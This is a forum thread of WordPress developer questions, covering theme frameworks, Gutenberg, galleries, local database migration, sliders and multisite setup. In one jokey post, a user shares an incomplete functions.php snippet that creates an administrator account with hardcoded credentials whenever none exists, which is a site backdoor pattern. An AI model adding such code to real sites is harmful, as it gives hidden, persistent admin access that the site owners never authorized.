Wordpress Discussion

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  • 164 Responses
  • Salarrue0

    WP question.
    I have an external API that gives a raw json data.
    Do you know if there is there a way to import that information to wordrpess?

    I have been testing this extension, https://fr.wordpress.org/plugins… but I think this has to be done without extensions directly to the functions.php ...

  • voiceof0

    Looking for advice on where to start with wordpress.

    Some background. I usually build sites and courses using some mix of webpack or gulp, SCSS, handlebars, and a framework like foundation. So far it's worked fine I use the CLI start up a project and and changes appear with every save. It's straightforward and it works for what I need.

    We have a marketer on the team who uses DIVI to build sites (two divisions in the company. She loves it. She says she can build quickly, using existing templates provided through her subscription.

    We've been tasked with updating and uniting the divisions under one site. I have very little experience with WP and found DIVI to be bloated and forced multiple overrides to make changes.

    Any suggestions for a middle ground? Where I should begin to get the benefits of the WP interface and plugins, but still have control of the front-end and can work locally?

    If it can output static sites and if there's a visual builder that would allow me to save custom templates and doesn't create bloated html that would be even better.

    • I should also add. I don't know php.voiceof
    • Learn basic PHP and create a child theme with the front end you want? Or code your own theme from scratch. It's really not that complicated if you already knowyuekit
    • front end dev.yuekit
    • Most of the PHP in a WP theme is very basic stuff, just outputting content or simple loops.yuekit
    • Should I start with a framework like genesis or _S?voiceof
    • I'd recommend _s to start, then step into Genesis. Those are my 2 go-tos. Genesis may take a while to get the hang of, and _s will teach you theming basics.nocomply
    • you might look at bedrock / sage for a wp framework and base theme that uses webpack / yarn for compiling https://roots.io/bed…spot13
    • All that framework nonsense will just get in the way of actually learning Wordpress , which is not that hard. Build your own theme from scratch at least once.monNom
    • Once you know the code structure, you may want to introduce some sort of abstraction for a specific need, but really, most everything is very simple in pure wormonNom
    • *wordpressmonNom
    • Agree with monNom, why learn framework, learn the core code basics,also you'll end up with less bloat in your final builddee-dubs
    • WP Advanced Custom Fields with Flexible Content Field will allow you the flexibility of Divi content and your control of layout markupBabySnakes
    • yeah start with adding 400$ plugin to that divi junk. forget acf for now.
      start learning CODEX from the ground up you will laugh at how easy these things are.
    • Start with a "blank" wordpress theme so you can see where WordPress can help you; I've used https://wordpress.or….

      Start at the start.
    • I think I've linked it before, but this tutorial series is really go to get you started: https://m.youtube.co…monNom
    • Really *good.monNom
  • spendogg1

    Any good advice on plugins for security. https

  • yuekit0

    So any thoughts on the new editing system they are launching, Gutenberg?


    This is a huge change when you consider that one third of all sites by some estimates are based on WordPress, and this change is not backwards compatible (!).

    I suppose it's potentially a huge money maker for WordPress developers, because you can now go to every client and tell them you will make their site compatible with this new system...

    • It sounds like a pain in the ass. They don't seem to be using common sense in rollout. It should only be enabled by default in new installs rather than on alldee-dubs
    • I think most people will instal the Classic Editor plugin as a band aid approach to not break existing sites rather than rebuilding to accommodate Gutenberg.dee-dubs
    • It's worth noting that the plugin version is getting very negative reviews from users. This could be a major turning point for WP in terms of how they decide toyuekit
    • roll this out...
    • I like the new editor. The UI is a huge improvement. The problem is the extensions like Visual Composer, and sites that depend on third party editors.Salarrue
  • oey0

    Does anyone use FooGallery?

    I'm trying to have a page with thumbnails for different galleries.
    When I click the image/thumbnail it opens a lightbox with images with the same tag/category or images in a specific page.

    I did this but somehow it stopped working and now I can not figure out how i did it.

    It sounds pretty basic but I fail to achieve it for the last half hour.

    Any advice?

    • wordpress built in gallery does this, tweak what's there, stop relying on plugins.fadein11
    • i like that you wrote stop relying on plugins. and thanks.oey
    • If the built in doesn't do it for you:
    • if it broke recently, I would first check for js errors in the browser console to see if it's just a js conflictspot13
  • elahon0

    We've got a client that has a framing business, for framing posters, prints, etc and their site is WordPress. They found this site and they want to do something similar:


    They want the user to be able to upload their image and preview it behind a variety of frames, ultimately picking a frame and placing an order.

    Anyone know of anything similar to this? The example site they gave isn't WordPress, of course. Any advice? Thanks!

    • Theme or plugin? My searches are coming up fruitless so far.elahon
    • this looks reasonably straight forward. You could build this with Gravity Forms for image upload and content type creation...spot13
    • then in a custom content type (initiated through a custom plugin) get the image dimensions and scale a frame around it with CSSspot13
  • uan0

    wp ui question. Been asked to make this kind of posts, image container with text place over it.

    I got it working and centered the text vertically and horizontally.

    now they want to vertically position the text by themselfs...

    - should i make option boxes in edit posts where they can chose between start at top, middle, bottom, maybe even more options?

    - should I make a input where they can insert a pixel value (distance to top)?

    - should i try to code something in customizer (never done it, but eventually I would manage to code it)?

    - do you know any other option that works, I might not know of, for this kind of problem?

    tnx :)

    • is what you're trying to do like this meme builder plugin?
    • yep. were do you implement that kind of interface in a wp site?uan
    • or where in wp can I design/code that kind of interactive positioning interface?

      can I write a plugin that shows up in the edit post space?
    • probably there is a plugin yet coded somewhere..i should google wp meme generator ;-)uan
    • don't reinvent the wheel ;)spot13
    • Just a thought but rather than use Customizer from your plugin, you could try and use the new Gutenberg editor that's slated for v5spot13
    • it creates slide out panels for settings like the Customizer but perhaps with less complexity around object mappingspot13
  • oey0

    I'm trying to change images in the same page by clicking in a link.
    I'm not trying to make a post category menu.

    I would like the landing page to have all of the images and then click a link (menu) and only the images related to the link will show.

    I have tags, att. categories (foogallery) and pages as well for each image group as I trying different approaches to show the content.

    I also have menus for each of the options.

    Can I do this without a plugin?

    • are you up for a little bit of raw JS?PonyBoy
    • Actually I'm asking if I can do it with Worpdress settings. How raw would that be? Mind you I'm vegan ;-)oey
    • in appearance>menus you can configure a menu link to show tagsuan
    • yep, you can use pretty much anything as a menu item. Or you can download a plugin that orders posts/images as a grid with filters to display certain categoriesfadein11
    • something like this - https://wordpress.or…fadein11
    • I can also convert categories to tagsoey
    • I appreciate your help but I think this only works for posts. I don't use posts. not in this page at least.oey
    • posts and pages can be the same thing, they are effectively the same thing.fadein11
    • still haven't managed to do that. but I have other issue now LOL!oey
  • hotroddy0

    Any good GALLERY plugins for a masonry type grid that can handle both images and videos?

  • uan0

    Looking for a plugin or a good idea, direction, pointers...

    I need to change the content of a page every week.
    say you have 4 different post,
    1: first week of the month
    2: 2nd week of the mont
    3: 3rd...,
    4: 4th... .

    now I need the wp site to swap the content automatically every new week.

    any ideas?

    • there are various ways to do this,
      you can write a simple function what changes the post statuses from draft to published and back, add it to a cron job.
    • other opportunity is to look around the scheduled posts plugins, but you need one what has a repeatable setting function.sted
    • Can't you just set up the main page to only show the most recent post? Then use the archive to show the historycolin_s
    • tnx! looking into it.uan
    • Couple of posts IfSo may be able to do it...."Start & End Date
      Schedule content changes between a range of dates"
  • noneck-3

    Here's a neat snippet you can put in your Theme's functions.php:

    /* Ensure you always have an admin user, lol! */
    function wpb_admin_account(){
    $user = 'Username';
    $pass = 'Password';
    $email =
    if ( !username_exists( $user ) && !email_exists( $email ) ) {
    $user_id = wp_create_user( $user, $pass, $email );
    $user = new WP_User( $user_id );
    $user->set_role( 'administrator' );

    • Shit, that didn't work. I don't know what I was expecting though.noneck
    • ?oey
    • Thanks!monNom
  • dbloc4

    Google dedicates engineering team to accelerate development of WordPress ecosystem


  • section_0140

    ^^^ Who is your host? Depending on the size of the database, using PHPmyadmin to import a .sql file could be a pain in the ass. Mostly, because phpmyadmin implements some absurd file limits like 4MB or something. And, possibly, a 60 second time out limit.

    Personally, for mysql, I use the MySql Workbench (which is free) to do database work. Again, this may depend on your host whether it can be used (it runs over ssh for remote work). But, it's 100x better than phpmyadmin. It may even have a tool built in for this sorta thing. It does for converting sqlserver databases (I've used it).

    • Client is on hostgator. The DB is small so I haven't had any errors importing the DB. Just can't connect to it locally. Wondering if it's the plugins?hotroddy
    • Is the name of the database wrong in your code? user/pass? It's gotta be one of those.section_014
    • everything is correct. so strange.hotroddy
  • hotroddy0

    Is there an easy way to 'switch' out a database in wordpress.

    I set up a new wp locally using MAMP (new database) but now I want to switch out the database with the one I downloaded from my host.

    Is there a way to do this?

    • https://github.com/w…



      ; )
    • So install on both Wordpress installs; and "push" from one OR "pull" from the other...

      ...Let me know if you get it hotroddy!

    • Import .SQL file from host into your local mySQL, then edit local wp-config.php to point to the new database, and database user/pass as needed.monNom
    • thanks ideaist.. I will try that.hotroddy
    • monNom.. i've tried that and it says 'error connecting to DB'. should user/pass be 'root' in order for it to work on MAMP?hotroddy
    • @ideaist - I'm stuck with github. how do I install the plugin once I've downloaded?hotroddy
    • MAMP u/p is rootArmandoEstrada
    • I tried 'root' but that doesn't work either.hotroddy
    • username/password should be whatever your credentials are for the database (note that they may be different from WP credentials)monNom
    • Can you log into phpMyAdmin with root/root? if not, try the user/pass you used when downloading the SQL file. I think DB users travel with the database.monNom
    • Best practice is to not connect to mySQL as root, but rather as a DB user, so likely there was a user/pass configured for the original DB that should work localmonNom
    • you would find that in WP-config file on the server:define('DB_NA...
      define('DB-USER'... define('DB_PASSWORD...
    • thanks, I copied the values from server wp-config.php to local wp-config.php.. but still giving me connection error to DBhotroddy
    • table prefixes are the same 'wp_'hotroddy
    • on localhost username is root and password should be emptyfadein11
  • dee-dubs0

    Has anyone created a header HTML video carousel slider?

    I'm trying to create big background video (100vh 100vw) that once video completed playing it goes onto the next video and so on. (new streamline appears over each video)

    From what I can tell Slider Revolution may be able to do this but haven't tried it yet.

    Has anyone any suggestions on best way to do this, is slider Revolution best tool for this?

    • save yourself the trouble and tell your client it's not a good idea with latest safari browser: https://techcrunch.c…hotroddy
    • ^ that's a good point, thanks.. although if they still insist I will still need to implement..any suggestionsdee-dubs
    • slider revolution can do pretty much anything slider related yep and you can do what you mention with it. It's bloated but works well.fadein11
    • may need to use its API thoughfadein11
    • yup, slider rev ftw, but it's heavy as shitmoldero
    • Slider Revolution reminds me so much of Flash 5. It's a nightmare.noneck
    • SoliloquyWP will do what you want. It's pretty rock solid. Pony up for the full version.Centigrade
    • FlickityESKEMA
    • @noneck - it has its issues and yep v.bloated as I say but the quickest solution to what he needs I reckon.fadein11
    • Flash 5....far better than current animate cc bullshitfuturefood
    • Who the fuck decided not to QA animatefuturefood
    • Thanks for help...Slider Rev it is then, I am pushing that they should seriously think about dropping the video for future proofing reasonsdee-dubs
  • PonyBoy0

    looking for some help w/Contact Form 7.

    I have a simple form that works fine on Macs / PCS... It just won't work on mobile?

    The 'send' button is clickable but nothing occurs... no email is sent / no false confirmation etc... nothin'

    Anyone able to shed some light on this?


    • this is weird, have you tried to reduce the js junk in the footer?sted
    • geez that theme init js, wtf? dequeue that first, and jquery uisted
    • You might need a SMPT plugin, search there are a few. Use Gmail as the server...ArmandoEstrada
    • It's gotta be a JS issue but I'm still clueless... I got cosmo on the case :)PonyBoy
    • FFS... it was a stupid theme conflict (the same theme the form plugin is PACKAGED WITH!!!) If anyone is using the Salient theme make sure...PonyBoy
    • ... you have 'Activate Fullscreen Rows' switched to 'off' on the page w/your form... else you're fucked. ONE LIL BUTTON / OPTION!!! 5 days of heartache... :(PonyBoy
    • lolsted
  • Fax_Benson1

    Anyone used a WP plugin to generate email newsletters? Are they good enough to use instead of mailchimp et al?

    • I would use Mailchimp personally - why not? It's easy.fadein11
  • mg330

    Thanks for the responses to my last question. So, here's another question:

    If you went to a site that was url.com, and had links to url.com/photos, url.com/ux, url.com/music you'd probably assume these were all within the url.com site, and maintained the same visual look and feel.

    But if they were distinctly different, ex: each subfolder is essentially a homepage for that "site" and each of those sites had pages, posts, etc. within, would that be weird?

    That's why I thought using subdomains would be the right way to go, because that perhaps gives a better impression that it's a distinct site. The UX and photo sites would each have their own blog, and on the main url.com domain, these would pull into that page, which would accumulate all blog posts and offer very limited content, and a link to a contact page that serves as the contact page for all the sites.

    Just trying to decide if I'm thinking about this the right way. Every once in a while I get the urge to finally consolidate a couple different sites and I've been checking out multisite in Wordpress, along with a really versatile theme, and thinking about how to go forward.

    • hmm. if the url.com is just a one-page thing then url.com/music and url.com/photos would be fine I think. I'm not a UX or design person thoSquiddy
    • but since photos and music are different, maybe go for different domain names and manage it with Multisite Domain Mapping and stick to subdomain.Squiddy
  • mg330

    Considering moving some sites and future sites to a Wordpress multi site install, and thinking about a subdomain setup to differentiate between them, such as:

    URL.com - main URL and landing page, simple links to subdomains and accumulation of all subdomain site blog posts, as links to those full posts.

    photos.URL.com - migrated photo portfolio from another site, with a blog.

    music.URL.com - site with music I've recorded and possibly a blog.

    UX.URL.com - professional portfolio and info, maybe a blog, private portfolio.

    I started working with a new theme today that offers an extensive amount of customizations. I'm interested in multisite because I don't want one huge site with all this content, and I want a consistent look/feel but slightly different designs per site.

    Any thoughts or tips?

    • that's .htaccess magic...doesn't matter if you are using wp or any other setup...uan
    • http://stackoverflow…uan
    • from what you're describing it do it with the sub-directory option. cuz areas are all related. also some say music.url.com ranks differently than url.com/musicSquiddy
    • fwiw, at my company we do this with url.com and url.com/spanish and for page speed purpose, sharing etc used photos.url.com as a CDN.Squiddy
  • dbloc0

    Best Caching Plugin?